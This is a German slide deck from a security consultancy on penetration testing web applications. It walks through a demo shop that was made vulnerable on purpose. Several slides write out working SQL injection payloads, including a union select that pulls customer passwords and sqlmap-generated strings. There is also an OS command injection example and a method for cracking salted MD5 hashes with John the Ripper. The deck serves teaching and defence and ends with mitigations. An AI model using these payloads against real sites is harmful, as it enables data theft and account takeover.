Penetrationstest Christian Pohl

Größe: px

Ab Seite anzeigen:

Download "Penetrationstest Christian Pohl"

Melanie Bayer
vor 7 Jahren
Abrufe

1 Penetrationstest Christian Pohl

2 Agenda Motivation Schwachstellen im Webumfeld Penetrationstests Vorteile Nachteile In medias res! Datenklau Benutzerkonten knacken Was kann ich tun? Seite 2

3 Motivation Quelle: Heise Security Seite 3

4 Schwachstellen im Webumfeld OWASP Top 10 A1-Injection A2-Cross Site Scripting (XSS) A3-Broken Authentication and Session Management A4-Insecure Direct Object References A5-Cross Site Request Forgery (CSRF) A6-Security Misconfiguration A7-Insecure Cryptographic Storage A8-Failure to Restrict URL Access A9-Insufficient Transport Layer Protection A10-Unvalidated Redirects and Forwards SQL, OS, and LDAP injection Eingabevalidierung, Maskierung Sessionfixation Directory Traversal, getfile.php Fernsteuerung des Browsers Absicherung des Netzwerks, der Server, Dienste... Passworte, Kreditkarten Durchgängige Berechtigungsprüfung Anmeldung über HTTP Ungeprüfte Weiterleitungen Seite 4

Protection A10-Unvalidated Redirects and Forwards SQL, OS, and LDAP injection Eingabevalidierung, Maskierung Sessionfixation Directory Traversal, getfile.

5 Penetrationstests Im technischen Sprachgebrauch versteht man unter einem Penetrationstest den kontrollierten Versuch,... in ein bestimmtes Computersystem bzw. -netzwerk einzudringen, um Schwachstellen zu identifizieren. Dazu werden die gleichen bzw. ähnliche Techniken eingesetzt, die auch bei einem realen Angriff verwendet werden. Quelle: Bundesamt für Sicherheit in der Informationstechnik (BSI), Studie zur Durchführung von Penetrationstests Seite 5

Dazu werden die gleichen bzw. ähnliche Techniken eingesetzt, die auch bei einem realen Angriff verwendet werden.

6 Penetrationstests Vorteile Extrem flexibel einsetzbar Technisch: Netz-, System- und Applikationsebene Organisatorisch: in Prozessen Vergleichsweise wenig Aufwand Fakten zur realen Schwachstellensituation, des Sicherheitsniveaus des Untersuchungsgegenstandes Bewertung der Sicherheitsrelevanz Grenzen Kein Anspruch auf Vollständigkeit Keine Aussage über zukünftige Situation Ursachenfindung meist nur sehr begrenzt möglich Seite 6

Sicherheitsniveaus des Untersuchungsgegenstandes Bewertung der Sicherheitsrelevanz Grenzen Kein Anspruch

7 In medias res Demoaufbau super-test-shop Apache Webserver OSCommerce modifiziert um anfällig für SQL-Injection und XSS zu sein. MySQL Browser Seite 7

8 In medias res - Vorsicht 202a StGB - Ausspähen von Daten (1) Wer unbefugt Daten, die nicht für ihn bestimmt und die gegen unberechtigten Zugang besonders gesichert sind, sich oder einem anderen verschafft, wird mit Freiheitsstrafe bis zu drei Jahren oder mit Geldstrafe bestraft. ( ) 269 StGB - Fälschung beweiserheblicher Daten (1) Wer zur Täuschung im Rechtsverkehr beweiserhebliche Daten so speichert oder verändert, dass bei ihrer Wahrnehmung eine unechte oder verfälschte Urkunde vorliegen würde, oder derart gespeicherte oder veränderte Daten gebraucht, wird mit Freiheitsstrafe bis zu fünf Jahren oder mit Geldstrafe bestraft. (2) Der Versuch ist strafbar. ( ) Bild: Robb at de.wikipedia Seite 8

( ) 269 StGB - Fälschung beweiserheblicher Daten (1) Wer zur Täuschung im Rechtsverkehr beweiserhebliche Daten so speichert oder verändert, dass bei ihrer Wahrnehmung eine

9 Informationssammlung Mit der Anwendung arbeiten Eingabefelder überprüfen auf Maskierung und Eingabevalidierung Sonderzeichen, HTML, Javascript, SQL Parameter Tampering Clientseitige Überprüfungen umgehen, Hidden-Fields Rückgabe auswerten Fehler? Ungewöhnliche Rückgabe? Notizen machen Nichts vergessen, Logbuch! Seite 9

Parameter Tampering Clientseitige Überprüfungen umgehen, Hidden-Fields Rückgabe

10 Informationssammlung Mit der Anwendung arbeiten Eingabefelder überprüfen auf Maskierung und Eingabevalidierung Sonderzeichen, HTML, Javascript, SQL Parameter Tampering Clientseitige Überprüfungen umgehen, Hidden-Fields Rückgabe auswerten Fehler? Ungewöhnliche Rückgabe? Notizen machen Nichts vergessen, Logbuch! Seite 10

11 Informationssammlung Mit der Anwendung arbeiten Eingabefelder überprüfen auf Maskierung und Eingabevalidierung Sonderzeichen, HTML, Javascript, SQL Parameter Tampering Clientseitige Überprüfungen umgehen, Hidden-Fields Rückgabe auswerten Fehler? Ungewöhnliche Rückgabe? Notizen machen Nichts vergessen, Logbuch! Seite 11

12 Informationssammlung Mit der Anwendung arbeiten Eingabefelder überprüfen auf Maskierung und Eingabevalidierung Sonderzeichen, HTML, Javascript, SQL Parameter Tampering Clientseitige Überprüfungen umgehen, Hidden-Fields Rückgabe auswerten Fehler? Ungewöhnliche Rückgabe? Notizen machen Nichts vergessen, Logbuch! Seite 12

13 Injection Injection Schwachstellen treten auf, wenn eine Applikation Daten einer nicht vertrauenswürdigen Quelle nimmt und diese ohne Überprüfung oder Maskierung als Teil eines Befehls an den Befehlsinterpreter sendet. Dies kann dazu führen, dass der Interpreter ungewollte Befehle ausführt und Zugriff auf geschützte Daten ermöglicht. Quelle: OWASP Seite 13

Befehls an den Befehlsinterpreter sendet.

14 Code Injection - Beispiel Einbringen eines Betriebssystembefehls in ein CGI-Skript Gewolltes Ergebnis: ping einer Maschine bsp.cgi? ruft man das ganze aber so auf: bsp.cgi? ;ls / Seite 14

Ergebnis: ping einer Maschine bsp.cgi?127.0.

15 SQL Injection Codebeispiel Einbringen von eigenen SQL-Befehlen in bestehende Datenbankabfragen (Beispiel in PHP). $query="select beschreibung from produkte where name like '".$_GET['name']."%' "; Gewollte resultierende Abfrage (name = "Uhr") Select beschreibung from produkte where name like 'Uhr%' Setze name=' union select password from customers where name like ' Resulitierende Datenbankabfrage Kundenlogins select beschreibung from produkte where name like '' union select password from customers where name like '%' Seite 15

"%' "; Gewollte resultierende Abfrage (name = "Uhr") Select beschreibung from produkte where name like 'Uhr%' Setze name=' union

16 SQL Injection - Ausprägungen Stacked Query Es wird ein zweiter SQL Befehl angehängt. Union Query Der Inhalt z.b. der Produktsuche wird über eine Union mit anderen Daten gefüllt. Error Based Die Ausgabe der Manipulation erscheint in einer Fehlermeldung. Blind Injection Indirekte Ausgabe der Manipulation. Ergebnisliste oder nicht. Fehlermeldung oder nicht. Seite 16

Error Based Die Ausgabe der Manipulation erscheint in einer Fehlermeldung.

17 Manueller Beweis in der Beispielapplikation Fehler or '1'='1 Bewertung Anakin (erstes Produkt im Artikelstamm) or '1'='0 Bewertung R2D2 (Produkt mir ID 30) and '1'='0 Redirekt auf Liste Seite 17

products_id=30' or '1'='1 Bewertung Anakin (erstes Produkt im Artikelstamm)

18 Datenklau boolen-based blind products_id=30' AND 2520=2520 AND 'KVus'='KVus Ergebnis oder nicht Ergebnis error-based products_id=30' AND (SELECT 4340 FROM(SELECT COUNT(*),CONCAT(0x3a a,(SELECT (CASE WHEN (4340=4340) THEN 1 ELSE 0 END)),0x3a696c793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HdRp'='HdRp Duplicate entry ':sdu:1:ily:1' for key 'group_key' UNION query products_id=-5215' UNION SELECT NULL, CONCAT(0x3a a,0x63756f ,0x3a696c793a), NULL, NULL, NULL, NULL from products p, products_description pd where 'SNzS'='SNzS [:sdu:cuoqerddcf:ily:] Anfällig für SQL Injection (Ausgabe des Tools sqlmap) Seite 18

CHARACTER_SETS GROUP BY x)a) AND 'HdRp'='HdRp 1062 - Duplicate entry ':sdu:1:ily:1' for key 'group_key' UNION query products_id=-5215' UNION SELECT NULL,

19 Benutzerkonten knacken select * from customers select * from administrators Opensource Anwendung, wir wissen wie das Passwort gespeichert wird Passwortfunktion: $hash=md5($salt.$plain) Passwortspalte: $hash:$salt Anfällig für SQL Injection John The Ripper entsprechend konfigurieren und ihn mit den (entsprechend formatierten) Hashes füttern. Seite 19

Benutzerkonten knacken select * from customers select * from administrators Opensource Anwendung, wir wissen wie das Passwort gespeichert wird Passwortfunktion: $hash=md5($salt.

20 Benutzerkonten knacken select * from customers select * from administrators Opensource Anwendung, wir wissen wie das Passwort gespeichert wird Passwortfunktion: $hash=md5($salt.$plain) Passwortspalte: $hash:$salt Anfällig für SQL Injection Wie viele Logins mit demselben Benutzer und Passwort haben Sie? John The Ripper entsprechend konfigurieren und ihn mit den (entsprechend formatierten) Hashes füttern. Seite 20

$plain) Passwortspalte: $hash:$salt Anfällig für SQL Injection Wie viele Logins mit demselben Benutzer

21 Was kann ich tun Sicherheit auf allen Ebenen Konfiguration von OS, DB, Applikationsserver Netzseitige Absicherung Richtige Benutzung der Datzenbankschnittstellen (Stichwort prepared Statements ) Begrenzung der Auswirkung von Schwachstellen Kann ich die Benutzerkennung bis zur Datenbank durchreichen? Label Security, Zugriff über Prozeduren, etc. Trennung Owner (DDL) vom Nutzer (DML) Jede Applikation hat ihr eignes Schema Sicherstellung der Nachvollziehbarkeit auf allen Ebenen Seite 21

22 Kontakt Secaron AG Ludwigstr. 45 D Hallbergmoos Tel Fax Ansprechpartner: Christian Pohl pohl@secaron.de Seite 22

Ähnliche Dokumente

Web 2.0-Hacking Live Vorführung. Philipp Rocholl, Secaron AG Proseminar "Network Hacking und Abwehr", 27.01.2011

Web 2.0-Hacking Live Vorführung Philipp Rocholl, Secaron AG Proseminar "Network Hacking und Abwehr", 27.01.2011 Übersicht Vorstellung Motivation Penetrationstests Schwachstellenklassen im Webumfeld Live